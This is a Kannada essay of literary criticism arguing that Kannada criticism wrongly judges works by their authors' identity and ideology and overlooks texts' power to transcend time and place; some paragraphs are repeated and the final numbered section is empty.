ಕಾಲದೇಶ ಮೀರಿದ ಕಸುವನ್ನು ನಿರಾಕರಿಸಲಾಗದು

ಕನ್ನಡ ವಿಮರ್ಶೆಯು ಕಳೆದ ಕೆಲವು ದಶಕಗಳಲ್ಲಿ ಸಾಗಿರುವ ದಾರಿಯನ್ನು ನೋಡಿದರೆ ಎರಡು ಬಗೆಯ ಬೆಳವಣಿಗೆಗಳು ಕಾಣುತ್ತವೆ. ಒಂದು: ಬರೆಹದಿಂದ ಬರೆಹಗಾರರ ಕಡೆಗೆ ಚಲನೆ. ಎರಡು: ಬರಹದಿಂದ `ಸಂಸ್ಕೃತಿ’ಯ ಕಡೆಗೆ ಚಲನೆ. ಇವೆರಡೂ ಬೆಳವಣಿಗೆಗಳು ಎಲ್ಲೋ ಒಂದು ಕಡೆ ಒಂದನ್ನೊಂದು ಸೇರಿಕೊಂಡು ಚಲಿಸುವುದನ್ನೂ ನೋಡುತ್ತೇವೆ.

1.
ಸಂವಾದಕ್ಕೆಂದು ಅಣಿಮಾಡಿರುವ ಕೇಳ್ವಿಗಳಲ್ಲೆ ನಮ್ಮ ಮಾತುಕತೆಗೆ ನೆರವಾಗುವ ಸಂಗತಿಗಳಿವೆ. ಬರೆದವರು ಮತ್ತು ಬರಹಗಳನ್ನು ಬೇರೆ ಬೇರೆಯಾಗಿ ಇರಿಸಬೇಕೇ, ಇಲ್ಲವೇ ಒಟ್ಟಾಗಿ ಇರಿಸಿ ನೋಡಬೇಕೆ ಎಂಬುದು ಕೇಳ್ವಿಯ ತಿರುಳು. ಅಲ್ಲದೆ ಹಾಗೆ ಒಟ್ಟಾಗಿ ಇರಿಸದೇ ಬರಹಗಳನ್ನು ನಾವು `ವಿಮರ್ಶಿಸಲು’ ಆಗುವುದೇ ಎಂಬ ಸಂದೇಹ ಕೂಡ ಆ ಕೇಳ್ವಿಯಲ್ಲಿ ಅಡಕವಾಗಿರುವಂತೆ ತೋರುವುದು. ಇರಲಿ. ಆ ಮಾತಿಗೆ ಮುಂದೆ ಬರುತ್ತೇನೆ.

ಕನ್ನಡ ವಿಮರ್ಶೆಯು ಕಳೆದ ಕೆಲವು ದಶಕಗಳಲ್ಲಿ ಸಾಗಿರುವ ದಾರಿಯನ್ನು ನೋಡಿದರೆ ಎರಡು ಬಗೆಯ ಬೆಳವಣಿಗೆಗಳು ಕಾಣುತ್ತವೆ. ಒಂದು: ಬರೆಹದಿಂದ ಬರೆಹಗಾರರ ಕಡೆಗೆ ಚಲನೆ. ಎರಡು: ಬರಹದಿಂದ `ಸಂಸ್ಕೃತಿ’ಯ ಕಡೆಗೆ ಚಲನೆ. ಇವೆರಡೂ ಬೆಳವಣಿಗೆಗಳು ಎಲ್ಲೋ ಒಂದುಕಡೆ ಒಂದನ್ನೊಂದು ಸೇರಿಕೊಂಡು ಚಲಿಸುವುದನ್ನೂ ನೋಡುತ್ತೇವೆ.

ಈಗ ಮೊದಲನೆಯದನ್ನು ನೋಡೋಣ. ವಿಮರ್ಶಕರು ಈಗ ಏನು ಬರೆಯಲಾಗಿದೆ ಎನ್ನುವುದಕ್ಕಿಂತ ಅದನ್ನು ಯಾರು ಬರೆದವರುಎನ್ನುವುದನ್ನು ಹೆಚ್ಚಾಗಿ ಗಮನಿಸುತ್ತಿದ್ದಾರೆ. ಇದು ಆರೋಪವಲ್ಲ. ಬರಹಗಳನ್ನು ಮತ್ತು ಬರೆದವರನ್ನು ಬೇರೆಬೇರೆ ಮಾಡಿ ಬರಹಗಳನ್ನು ಚರ್ಚಿಸುವ ಬಗೆಯನ್ನು ಈಗ ಬಹುಮಟ್ಟಿಗೆ ಬೇಡವಾದುದೆಂದು ಬದಿಗೆ ಸರಿಸಲಾಗಿದೆ. ಹೀಗೆ ಮಾಡುವಾಗಲೂ ಇಬ್ಬಗೆಯ ನಿಲುವುಗಳು ಕಾಣುತ್ತಿವೆ. ಯಾರು ಬರೆದವರು ಎಂಬುದು ನಮಗೆ ಗೊತ್ತಿರುವಾಗ ಬರಹಕ್ಕೂ ಬರಹಗಾರರಿಗೂ ಇರುವ ನಂಟನ್ನು ನಾವು ಮುಂಚೂಣಿಗೆ ತರುತ್ತೇವೆ. ಒಂದು ವೇಳೆ ಬರೆದವರು ಯಾರು ಎಂಬುದು ಗೊತ್ತಿಲ್ಲದಿರುವಾಗ, ಎತ್ತುಗೆಗೆ ಬಾಯ್ದೆರೆಯ ರಚನೆಗಳನ್ನು (ಇಂತಹ ರಚನೆಗಳನ್ನು ಜಾನಪದ ಎಂದು ಕರೆಯುವುದು ಬಳಕೆಯಲ್ಲಿದೆ) ಗಮನಿಸುವಾಗ ಆ ಬರಹದ (ಇಲ್ಲವೇ ರಚನೆಯ) ನಿಲುವುಗಳನ್ನು ನಿರೂಪಿಸುವವರ ಇಲ್ಲವೇ ಕೇಳುವವರ ನಿಲುವುಗಳೆಂದು ಬಿಂಬಿಸುವ ಯತ್ನ ಮೊದಲಾಗುತ್ತದೆ.

ನಮ್ಮ ವಿಮರ್ಶಕರೂ ಈ ತಿಳಿವಳಿಕೆಯನ್ನು `ಒಪ್ಪಿ’ ಅದನ್ನು ಬರಹಗಳನ್ನು ಅರಿತುಕೊಳ್ಳಲು ಬಳಸುತ್ತಾರೆ. ಈ ದಾರಿಯಲ್ಲಿ ಇರುವ ಎರಡು ಅಪಾಯಗಳನ್ನು ಮೊದಲಿಗೆ ಗುರುತಿಸಿಕೊಳ್ಳಬೇಕು. ಒಂದು: ಹೀಗೆ ಮೊದಲೇ ದೊರೆತ ತಿಳಿವಳಿಕೆಗೆ ಪುರಾವೆಗಳನ್ನೋ ಇಲ್ಲವೇ ಸಮರ್ಥನೆಗಳನ್ನೋ ಬರಹಗಳಲ್ಲಿ ಹುಡುಕುತ್ತಿರುತ್ತೇವೆ.

ಅಡಿಗರ ಕಾವ್ಯದಲ್ಲಿ ಸ್ತ್ರೀ ಸಂವೇದನೆ ಎಂಬ ವಿಷಯ ಮತ್ತು ಮಂಟೇಸ್ವಾಮಿ ಕಾವ್ಯದಲ್ಲಿ ಸ್ತ್ರೀ ಸಂವೇದನೆ ಎಂಬ ವಿಷಯ -ಈ ಎರಡೂ ವಿಷಯಗಳ ಚರ್ಚೆಗಳಲ್ಲಿ ನಾವು ಬಳಸುತ್ತಿರುವ ಮಾಪುಗೋಲುಗಳು ಬೇರೆಬೇರೆಯಾಗಿವೆ. ಈ ಮಾತೆಲ್ಲವನ್ನೂ ಪ್ರಗತಿಪರತೆ, ಪ್ರತಿಗಾಮಿ ನಿಲುವು, ಜನಪರ ನಿಲುವು, ಸ್ತ್ರೀ ಸಂವೇದನೆ, ಚಾರಿತ್ರಿಕತೆ ಇವೇ  ಮುಂತಾದ ಯಾವ ಚೌಕಟ್ಟನ್ನು ಇರಿಸಿ ನೋಡುವಾಗಲೂ ನಮ್ಮ ಮಾಪುಗೋಲುಗಳು ಬದಲಾಗುತ್ತಲೇ ಇರುತ್ತವೆ.

ಇನ್ನು ಎರಡನೆಯ ದಾರಿಯನ್ನು ಕೊಂಚ ನೋಡೋಣ. ನಾನು ಬೇಕೆಂತಲೇ ‘ಸಂಸ್ಕೃತಿ’ ಎಂಬ ಪದವನ್ನು ಉಲ್ಲೇಖನ ಗುರುತುಗಳಲ್ಲಿ ಇರಿಸಿದ್ದೇನೆ. ಏಕೆಂದರೆ ಆ ಪದವನ್ನು ವಿವರಿಸುವಾಗ ಬಹುಮಟ್ಟಿಗೆ ತಮ್ಮ ನೇರಕ್ಕೆ ಬೇಕಾದ ದಾರಿಗಳನ್ನು ಆಯ್ದುಕೊಳ್ಳಲಾಗುತ್ತದೆ. ಹೆಚ್ಚಾಗಿ ಬೇರೆ ಮೂಲಗಳಿಂದ ಒದಗಿದ ತಿಳಿವಳಿಕೆಯನ್ನು ಬಳಸಿಕೊಂಡು ಸಂಸ್ಕೃತಿಯನ್ನು ನಿರೂಪಿಸಿಕೊಳ್ಳಲಾಗುತ್ತದೆ. ಸಮಾಜ ಶಾಸ್ತ್ರ, ಚರಿತ್ರೆ, ಮಾನವ ಶಾಸ್ತ್ರ, ಮನೋವಿಜ್ಞಾನ ಇವೇ ಮುಂತಾದ ಆಕರಗಳು ಈ ತಿಳಿವಳಿಕೆಯನ್ನು ನಮಗೆ ಒದಗಿಸುತ್ತಿವೆ. ನಮ್ಮ ವಿಮರ್ಶಕರೂ ಈ ತಿಳಿವಳಿಕೆಯನ್ನು `ಒಪ್ಪಿ’ ಅದನ್ನು ಬರಹಗಳನ್ನು ಅರಿತುಕೊಳ್ಳಲು ಬಳಸುತ್ತಾರೆ. ಈ ದಾರಿಯಲ್ಲಿ ಇರುವ ಎರಡು ಅಪಾಯಗಳನ್ನು ಮೊದಲಿಗೆ ಗುರುತಿಸಿಕೊಳ್ಳಬೇಕು. ಒಂದು: ಹೀಗೆ ಮೊದಲೇ ದೊರೆತ ತಿಳಿವಳಿಕೆಗೆ ಪುರಾವೆಗಳನ್ನೋ ಇಲ್ಲವೇ ಸಮರ್ಥನೆಗಳನ್ನೋ ಬರಹಗಳಲ್ಲಿ ಹುಡುಕುತ್ತಿರುತ್ತೇವೆ. ಬರಹಗಳಿಂದಲೇ ಯಾವುದಾದರೂ ತಿಳಿವಳಿಕೆ ದೊರೆಯಬಹುದೇ ಎಂಬ ನೆಲೆ ನಮಗೆ ಕಾಣಿಸುವುದಿಲ್ಲ. ಎರಡು: ಸಂಸ್ಕೃತಿ ಎನ್ನುವುದು ಇರುವುದೋ ಇಲ್ಲವೇ ಆಗುವುದೋ ಎಂಬ ಬಗೆಗೆ ಗೊಂದಲವೊಂದು ಹುಟ್ಟಿಕೊಳ್ಳುತ್ತದೆ. ಗೊತ್ತಿರುವ ತಿಳಿವಳಿಕೆಯನ್ನು ಬಳಸುವಾಗ ಬರಹಗಳಲ್ಲಿ ಇರುವ ಸಂಸ್ಕೃತಿ ವಿವರಗಳು ಈಗಾಗಲೇ `ಇರುವುದು’ ಎಂದು ತಿಳಿಯುತ್ತಿರುತ್ತೇವೆ. ಆದರೆ ಬರಹಗಳಲ್ಲಿ ಸಂಸ್ಕೃತಿಯು ಈಗಾಗಲೇ ಇರುವುದಾಗಿರದೇ ಅಲ್ಲೇ, ಆಗಲೇ `ಆಗುತ್ತಿರುವ’ ಸಾಧ್ಯತೆ ನಮ್ಮ ಗಮನಕ್ಕೆ ಬರುವುದಿಲ್ಲ.

ಇರುವಿಕೆ ಮತ್ತು ಆಗುವಿಕೆಗಳು ಹೇಗೆ ಬೇರೆಬೇರೆ ಎಂಬುದನ್ನು ವಿವರಿಸಿಕೊಳ್ಳುವುದು ಅಗತ್ಯ. ಅಸಮಾನತೆ ಎನ್ನುವುದು ಒಂದು ಸಾಂಸ್ಕೃತಿಕ ವಿವರ. ಅದು `ಇರುತ್ತದೆ’. ಆದರೆ ಅಸಮಾನತೆಯು ಯಾವ ಬಗೆಯಲ್ಲಿ ಮೈದಳೆಯುತ್ತದೆ; ಅದರ ಪರಿಣಾಮಗಳು ಯಾವಯಾವ ದಿಕ್ಕಿನಲ್ಲಿ ಹೇಗೆ ರೂಪುಗೊಳ್ಳುತ್ತವೆ. ಪ್ರಜ್ಞೆಯ ಸ್ತರಗಳನ್ನು ಅದು ತನ್ನ ಹಿಡಿತಕ್ಕೆ ತೆಗೆದುಕೊಳುತ್ತದೆ ಎಂಬೀ ಸಂಗತಿಗಳೆಲ್ಲ ಅಸಮಾನತೆಯ ಆಚರಣೆಯಲ್ಲಿ `ಆಗುತ್ತಿರುವ’ ನೆಲೆ. ನಮ್ಮ ವಿಮರ್ಶೆ ಬರಹಗಳಲ್ಲಿ ಈ `ಆಗುವಿಕೆ’ಯನ್ನು ಗಮನಿಸಬೇಕಾದರೆ ಮೊದಲಿಗೆ ತನಗೆ ಈಗಾಗಲೇ ದೊರೆತಿರುವ ತಿಳಿವಳಿಕೆಯನ್ನು ಇಡಿಯಾಗಿ ಬಳಸುವುದನ್ನು ಅಮಾನತ್ತಿನಲ್ಲಿ ಇಡಬೇಕು. ಬರಹಗಳನ್ನು ಒಳಗಿನಿಂದ ನೋಡುವ  ಬಗೆಯನ್ನು ರೂಪಿಕೊಳ್ಳಬೇಕಾಗುತ್ತದೆ.

ನುಡಿ ಸಂಸ್ಕೃತಿಯೊಂದು ತನ್ನ ಬರಹಗಾರರನ್ನು ಮುಂಚೂಣಿಗೆ ತಂದು ಮನ್ನಣೆಗೆ ತರುವುದು ಒಂದು ಅತಿರೇಕಕ್ಕೆ ಹೋದಾಗ ಏನಾಗುತ್ತದೆ ಎಂಬುದಕ್ಕೆ ಕನ್ನಡ ನುಡಿ ಸಂಸ್ಕೃತಿ ಒಂದು ಕಣ್ಣಿಗೆ ರಾಚುವ ಉದಾಹರಣೆಯಾಗಿದೆ. ಇದರ ಪರಿಣಾಮಗಳೇನು ಎಂಬುದನ್ನು ನೋಡೋಣ.

2.
ಬರಹ ಮತ್ತು ಬರಹಗಾರರನ್ನು ಒಟ್ಟಾಗಿರಿಸಿ ನೋಡುವ ಬಗೆಯನ್ನು ನಮ್ಮ ವಿಮರ್ಶೆ ಬಹುವಾಗಿ ನೆಮ್ಮಿರುವುದನ್ನು ಮೊದಲಲ್ಲಿ ಹೇಳಿದೆ. ಇದು ಒಂದು ಅತಿರೇಕಕ್ಕೆ ಹೋದರೆ ಬರಹ ಹಿಂದೆ ಸರಿದು ಬರಹಗಾರರು ಮುಂಚೂಣಿಗೆ ಬರುತ್ತಾರೆ. ಈಗ ಏನಾಗಿದೆ? ಒಮ್ಮೆ ಬರಹಗಾರರಿಗೆ `ಅಧಿಕೃತತೆ’ ದೊರೆತರೆ ಅವರು ಬರೆದದ್ದೆಲ್ಲವೂ ತಾನೇ ತಾನಾಗಿ ಅಧಿಕೃತಗೊಳ್ಳುತ್ತದೆ. ಹಾಗಾಗದೆ ಬರಹಗಾರರು ಅಧಿಕೃತಗೊಳ್ಳದೆ ಹೋದರೆ ಅವರು ಬರೆಯುವುದೆಲ್ಲ ಅನಧಿಕೃತಗೊಳ್ಳುತ್ತದೆ. ಇಲ್ಲವೆ ಅಂತಹ ಬರಹಗಳು ಮತ್ತು ಅವುಗಳನ್ನು ಬರೆದವರು ಯಾವಾಗಲೂ ಅಧಿಕೃತತೆಗೆ ಹಪಹಪಿಸುತ್ತಿರುವುದನ್ನು ಕಾಣುತ್ತೇವೆ. ಹೀಗೆ ಬರಹಗಾರರನ್ನು ಆಯ್ದುಕೊಳ್ಳುವ ಇಲ್ಲವೇ ನಿರಾಕರಿಸುವವರಿಗೆ ಸಮರ್ಥನೆಗಳಿರಬಹುದು. ಆದರೆ ಆ ಸಮರ್ಥನೆಯ ಬುಡ ಭದ್ರವಿರುವಂತಿಲ್ಲ.

ಬರಹಗಾರರ ಹೆಸರು ಕೇವಲ ಸೂಚಕಗಳಾಗಿರುವ ಬದಲಿಗೆ ಅವೇ ಸೂಚ್ಯಗಳಾಗಿ ಬದಲಾಗಿರುವುದು ಒಂದು ವಿಪರ್ಯಾಸ. ಹಾಗಾಗಿ ನಮ್ಮ ವಿಮರ್ಶೆಯ ಬರಹಗಳಲ್ಲಿ ಈ ವಿಪರ್ಯಾಸದ ಬಿಂಬಗಳು ಎದ್ದುಕಾಣುತ್ತಿವೆ. ನುಡಿ ಸಂಸ್ಕೃತಿಯೊಂದು ತನ್ನ ಬರಹಗಾರರನ್ನು ಮುಂಚೂಣಿಗೆ ತಂದು ಮನ್ನಣೆಗೆ ತರುವುದು ಒಂದು ಅತಿರೇಕಕ್ಕೆ ಹೋದಾಗ ಏನಾಗುತ್ತದೆ ಎಂಬುದಕ್ಕೆ ಕನ್ನಡ ನುಡಿ ಸಂಸ್ಕೃತಿ ಒಂದು ಕಣ್ಣಿಗೆ ರಾಚುವ ಉದಾಹರಣೆಯಾಗಿದೆ. ಇದರ ಪರಿಣಾಮಗಳೇನು ಎಂಬುದನ್ನು ನೋಡೋಣ.

3.
ಬರಹ ಮತ್ತು ಬರಹಗಾರರ ನಂಟನ್ನು ಚರ್ಚಿಸುವಾಗ ಎರಡು ನೆಲೆಗಳಲ್ಲಿ ನಮ್ಮ ವಿಮರ್ಶೆ ಸಾಗುತ್ತಿದೆ. ಒಂದು: ಬರಹಗಾರರು ಒಪ್ಪಿ ಪ್ರತಿಪಾದಿಸುವ ವೈಚಾರಿಕ ನೆಲೆಗಟ್ಟನ್ನು ಆಧರಿಸಿ ಚರ್ಚೆಯನ್ನು ಮಾಡುವುದು. ಎರಡು: ಬರಹಗಾರರ ವೈಯಕ್ತಿಕ ಬದುಕಿನ ವಿವರಗಳನ್ನು ಆಧರಿಸಿ ಚರ್ಚೆಯನ್ನು ಮಾಡುವುದು. ಬರಹಗಾರರು ಪ್ರತಿಪಾದಿಸುವ ವೈಚಾರಿಕ ನೆಲೆಗಟ್ಟಿಗೂ ಅವರ ವೈಯಕ್ತಿಕ ಬದುಕಿಗೂ ನಂಟನ್ನು ಕಲ್ಪಿಸುವ ಮತ್ತೊಂದು ಬಗೆಯೂ ಇದೆ. ಈ ಎರಡರ ನಡುವೆ ಬಿರುಕುಗಳು ಕಂಡಾಗ ನಮ್ಮ ವಿಮರ್ಶೆ ಹೆಚ್ಚು ಉತ್ಸಾಹದಲ್ಲಿ ಚರ್ಚೆಯನ್ನು ಬೆಳೆಸುತ್ತದೆ.

ಓದುವವರ ಜೊತೆಗೆ ಆ ಬರಹಗಳು ಸಂವಾದಕ್ಕೆ ತೊಡಗಲು ಸಾಧ್ಯವಾಗುವುದು ಯಾವಾಗ? ಅವರ ಸಂದರ್ಭಕ್ಕೆ ತಕ್ಕ ಸಂವೇದನೆಗಳನ್ನು ಆ ಬರಹಗಳು ತಮ್ಮಲ್ಲಿ ಒಳಗೊಂಡಿರಲೇ ಬೇಕಲ್ಲವೇ?

4.
ಬರಹವನ್ನು ಅದು ಮೈದಳೆದ ಸಂದರ್ಭದಲ್ಲಿ ಇರಿಸಿ ನೋಡುವುದರಲ್ಲಿ ಏನು ಕೊರತೆಯಿದೆ ಎಂದು ಕೇಳಬಹುದು. ಅದರಲ್ಲಿ ಕೊರತೆಯೇನೋ ಇಲ್ಲ. ಆದರೆ ಅದೇ ಕೊನೆಯ ಆಯ್ಕೆಯಾದರೆ ಸಮಸ್ಯೆಗಳು ಹುಟ್ಟಿಕೊಳ್ಳುತ್ತವೆ. ಬರಹ ಮೈದಳೆದ ಸಂದರ್ಭ ಎಂದಾಗ ಅದರಲ್ಲಿ ಬರಹಗಾರರ ಹಿನ್ನೆಲೆ (ಸಾಮಾಜಿಕ, ಮಾನಸಿಕ), ಅವರ ವೈಚಾರಿಕ ನಿಲುವುಗಳು, ಆ ಹೊತ್ತಿನ ಸಾಹಿತ್ಯಕ ಓಲುವೆಗಳು ಇವೆಲ್ಲವೂ ಸೇರುತ್ತವೆ. ಇವೆಲ್ಲವೂ ಬರಹವೊಂದನ್ನು ರೂಪಿಸಿರುತ್ತವೆ ಎಂದು ಒಪ್ಪಿದರೂ ಅವೆಲ್ಲವನ್ನು ಮೀರುವ ಕಸುವು ಬರಹಕ್ಕೆ ಇರುವುದಿಲ್ಲವೇ ಎಂಬ ಪ್ರಶ್ನೆಯೊಂದು ಎದುರಾಗುತ್ತದೆ. ಬರಹವನ್ನು ಓದುತ್ತಿರುವವರ ಸಂದರ್ಭವೊಂದು ಇದೆಯಲ್ಲವೇ? ಸೊಪೋಕ್ಲಿಸ್, ಶೇಕ್ಸ್‍ಪಿಯರ್, ನೆರುಡಾ ಇವೇ ಮೊದಲಾದವರ ಬರಹಗಳನ್ನು ಆ ಬರಹಗಳ ಸಂದರ್ಭದಲ್ಲಿ ಇರಿಸಿ ಓದುವುದೊಂದೇ ನಮಗಿರುವ ಆಯ್ಕೆಯೇ? ಹಾಗಿದ್ದಲ್ಲಿ ನಾವು ಅವರ ಬರಹಗಳನ್ನೆಲ್ಲ ಓದುವ ಉಸಾಬರಿಗೇ ಹೋಗುತ್ತಿರಲಿಲ್ಲ. ಓದುವವರ ಜೊತೆಗೆ ಆ ಬರಹಗಳು ಸಂವಾದಕ್ಕೆ ತೊಡಗಲು ಸಾಧ್ಯವಾಗುವುದು ಯಾವಾಗ? ಅವರ ಸಂದರ್ಭಕ್ಕೆ ತಕ್ಕ ಸಂವೇದನೆಗಳನ್ನು ಆ ಬರಹಗಳು ತಮ್ಮಲ್ಲಿ ಒಳಗೊಂಡಿರಲೇ ಬೇಕಲ್ಲವೇ? ಹಾಗಾಗಿ ಬರಹಗಳನ್ನು ವಿಮರ್ಶಿಸುವವರು ಅವುಗಳನ್ನು  ಬರೆದವರಿಂದ ಬೇರ್ಪಡಿಸಿ ಪರಿಶೀಲಿಸುವ ಹಾದಿಯನ್ನು ಹಿಡಿಯಲೇ ಬೇಕು. ನಮ್ಮ ವಿಮರ್ಶೆ ಈ ಹಾದಿಯನ್ನು ತುಳಿಯುವ ಸಂದರ್ಭಗಳು ಈಗ ಇಲ್ಲವಾಗುತ್ತಿವೆ.

ಇಡೀ ಸಂದರ್ಭವನ್ನು ಇನ್ನೊಂದು ಕಡೆಯಿಂದ ನೋಡೋಣ. ಬರಹಗಾರರ ಹಿನ್ನೆಲೆಯನ್ನು ಮುಂಚೂಣಿಯಲ್ಲಿ ಇರಿಸಿಕೊಂಡು ಬರಹವನ್ನು ವಿಮರ್ಶೆಗೆ ಒಳಪಡಿಸುವಾಗ ಅಂತಹ ವಿಮರ್ಶಕರು ಓದುಗರ ಪರವಾಗಿ ನ್ಯಾಯಾಧೀಶರಂತೆ ವರ್ತಿಸುತ್ತಿರುತ್ತಾರೆ. ಅಂದರೆ ಬರಹವನ್ನು ವಿಶ್ಲೇಷಿಸುವ ಪರಿಕರಗಳು ಓದುಗರಿಗೂ ಅನ್ವಯಿಸುತ್ತವೆ ಎನ್ನುವುದನ್ನು ಅಮಾನತ್ತಿನಲ್ಲಿ ಇರಿಸಿರುತ್ತಾರೆ. ಓದುಗರಿಗೂ ವೈಚಾರಿಕ ಓಲುವೆಗಳಿರುತ್ತವೆ. ಅವರೂ ಕೂಡ ಗೊತ್ತಾದ ಸಾಮಾಜಿಕ ಮತ್ತು ಮಾನಸಿಕ ಹಿನ್ನೆಲೆಯನ್ನು ಹೊಂದಿರುತ್ತಾರೆ. ಬರಹದ ಓದಿನಲ್ಲಿ ಇವೆಲ್ಲವೂ ಪಾಲು ಪಡೆದುಕೊಳ್ಳುತ್ತವೆ ಎನ್ನುವುದನ್ನು ಬದಿಗಿಟ್ಟು ಬರಹ ಮತ್ತು ಬರಹಗಾರರ ನಂಟನ್ನು ಮಾತ್ರ ಗಮನಿಸುವ ಮೂಲಕ ನಮ್ಮ ವಿಮರ್ಶೆ ಓದುಗರಿಗೆ ನಿರೀಕ್ಷಣಾ ಜಾಮೀನು ನೀಡುತ್ತಿದೆ.

ಅದೆಲ್ಲಕ್ಕೂ ಹೆಚ್ಚಿನ ಸಂಗತಿಯೊಂದಿದೆ. ಇಂತಹ ಬರಹಗಾರರ ಬರಹಗಳನ್ನು ಓದುತ್ತಿರುವವರು ಈ ಎಲ್ಲ ಓಲುವೆಗಳಿಂದ ಬಿಡುಗಡೆ ಪಡೆದ ಇಲ್ಲವೆ ಓದುವಾಗ ತಮ್ಮಲ್ಲಿರುವ ನಂಬಿಕೆಗಳನ್ನು ಅಮಾನತ್ತಿನಲ್ಲಿ ಇರಿಸಿರುವುದಿಲ್ಲ ತಾನೆ?

ಒಂದೆರಡು ಉದಾಹರಣೆಗಳನ್ನು ನೋಡೋಣ. ಹೆಂಗಸು ಬರಹಗಾರರ ಬರಹವನ್ನು ನೋಡುವಾಗ ಅದರಲ್ಲಿ ಹೆಣ್ಣು ಸಂವೇದನೆ ಇದೆಯೋ, ಹಾಗೆ ಅದು ಅಲ್ಲಿ ಇದ್ದರೆ ಅದು ಅಧಿಕೃತವೇ ಎಂಬುದನ್ನು ಪರಿಶೀಲಿಸಲಾಗುತ್ತದೆ. ಆದರೆ ಗಂಡು ಬರಹಗಾರರ ಬರಹದಲ್ಲಿ ಇರುವ ಗಂಡು ಸಂವೇದನೆಯನ್ನು ಮಾತ್ರ ಅದು ಅವರ
ಬರಹದಲ್ಲಿರುವುದು ಸಹಜವೆಂಬಂತೆ ಮುಂದುವರೆಯಲಾಗುತ್ತದೆ. ಆ ಬರಹದಲ್ಲಿ ಅಡಕವಾಗಿರುವ ಗಂಡು ಹೆಮ್ಮೆ, ಹೆಣ್ಣನ್ನು ಗೌಣ ಮಾಡುವ ನೆಲೆಗಳು ವಿಮರ್ಶಕರಿಗೆ ಮುಖ್ಯವೆನಿಸುವುದೇ ಇಲ್ಲ. ಅದೆಲ್ಲಕ್ಕೂ ಹೆಚ್ಚಿನ ಸಂಗತಿಯೊಂದಿದೆ. ಇಂತಹ ಬರಹಗಾರರ ಬರಹಗಳನ್ನು ಓದುತ್ತಿರುವವರು ಈ ಎಲ್ಲ ಓಲುವೆಗಳಿಂದ ಬಿಡುಗಡೆ ಪಡೆದ ಇಲ್ಲವೆ ಓದುವಾಗ ತಮ್ಮಲ್ಲಿರುವ ನಂಬಿಕೆಗಳನ್ನು ಅಮಾನತ್ತಿನಲ್ಲಿ ಇರಿಸಿರುವುದಿಲ್ಲ ತಾನೆ? ಹಾಗಿದ್ದಲ್ಲಿ ಒಂದು ಬರಹವನ್ನು ಕೇವಲ ಬರಹಗಾರರ ನೆಲೆಯಿಂದ ಮಾತ್ರ ನೋಡುವುದು ಸರಿಯಾದ ಹಾದಿಯಾಗದು.

5.
ಇನ್ನೂ ಕೆಲವು ವಿವರಗಳನ್ನು ನೋಡೋಣ. ಸಾಮಾನ್ಯವಾಗಿ ನಮ್ಮ ವಿಮರ್ಶೆ ಬರಹಗಾರರ ವೈಚಾರಿಕ ನೆಲೆಗಳನ್ನು ಕೆಲವು ಗುಂಪುಗಳಲ್ಲಿ ಇರಿಸುತ್ತದೆ. ಜನಪರ, ಜನವಿರೋಧಿ. ಜನಪ್ರಿಯ ಎಂಬುದು ಒಂದು ಮಾದರಿ. ಪ್ರಗತಿಪರ, ಪ್ರತಿಗಾಮಿ ಎಂಬುದು ಇನ್ನೊಂದು ಮಾದರಿ. ಪ್ರಗತಿಪರವಾಗಿದ್ದರೂ ಕಲಾತ್ಮಕವಾಗಿರದ ಮತ್ತು ಕಲಾತ್ಮಕವಾಗಿದ್ದರೂ ಪ್ರತಿಗಾಮಿಯಾಗಿರುವ ಎಂಬ ವಿವರಣೆ ಇನ್ನೊಂದು ಮಾದರಿ. ಈ ಮಾದರಿಯಲ್ಲಿ ಕಲಾತ್ಮಕ ಎಂಬ ಮಾತಿನ ವಿವರಣೆ ಅಷ್ಟು ನಿಖರವಾಗಿರುವುದಿಲ್ಲ ಎಂಬುದನ್ನು ಗಮನದಲ್ಲಿಡಬೇಕು.

ಇಷ್ಟು ಹೇಳಿದಾಗಲೂ ಬರಹಗಾರರ ವೈಚಾರಿಕ ನಿಲುವುಗಳು. ಓಲುವೆಗಳು ಸಾರ್ವಜನಿಕ ಚರ್ಚೆಯಿಂದ ಹೊರಗುಳಿಯಬೇಕೆಂದು ಹೇಳಿದಂತಲ್ಲ. ಆ ಬಗೆಯ ಚರ್ಚೆಗಳು ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆಯ ವ್ಯಾಪ್ತಿಯಲ್ಲಿ ಬರುವುದಿಲ್ಲ  ಎಂದಷ್ಟೇ ತಿಳಿಯುವುದು ಅಗತ್ಯ. ಹಾಗೆಯೇ ಬರಹಗಾರರ ವೈಯಕ್ತಿಕ ಹಿನ್ನೆಲೆ ಮತ್ತು ಅವರ ಬರಹಗಳ ನಂಟು ಕೂಡ ಸಾಮಾಜಿಕವಾಗಿ ಚರ್ಚಿತವಾಗಬೇಕಾದ ಸಂಗತಿಯಲ್ಲ. ಹೀಗೆ ಆ ನಂಟನ್ನು ಮುಂದೆಮಾಡಿ ಚರ್ಚಿಸುವವರು ಬರಹಕ್ಕೆ ಇರುವ ಕಾಲ ದೇಶಗಳನ್ನು ಮೀರುವ ಕಸುವನ್ನು ನಿರಾಕರಿಸುತ್ತಿರುತ್ತಾರೆ. ಇಲ್ಲವೆ ಕಡೆಗಣಿಸುತ್ತಿರುತ್ತಾರೆ.

ಈ ಬರಹ ಇಲ್ಲವೇ ನುಡಿ ರಚನೆಗಳನ್ನು ಆಯಾ ನುಡಿ ಸಂಸ್ಕೃತಿಗಳು ಹೇಗೆ ತಮ್ಮದನ್ನಾಗಿಸಿಕೊಳ್ಳುತ್ತವೆ ಎಂಬುದು ಮಾತ್ರ ಹಲವು ನೆಲೆಗಳನ್ನು ಹೊಂದಿದೆ. ಆದರೆ ಆಧುನಿಕ ಕಾಲವನ್ನು ಹೊರತುಪಡಿಸಿದರೆ ಎಂದೂ ಈ ಬರಹ ಇಲ್ಲವೇ ನುಡಿ ರಚನೆಗಳಿಗೆ ಅವುಗಳನ್ನು ರೂಪಿಸಿದವರ ಅಧಿಕಾರ ಮುದ್ರೆ ಇರಲಿಲ್ಲ.

6.
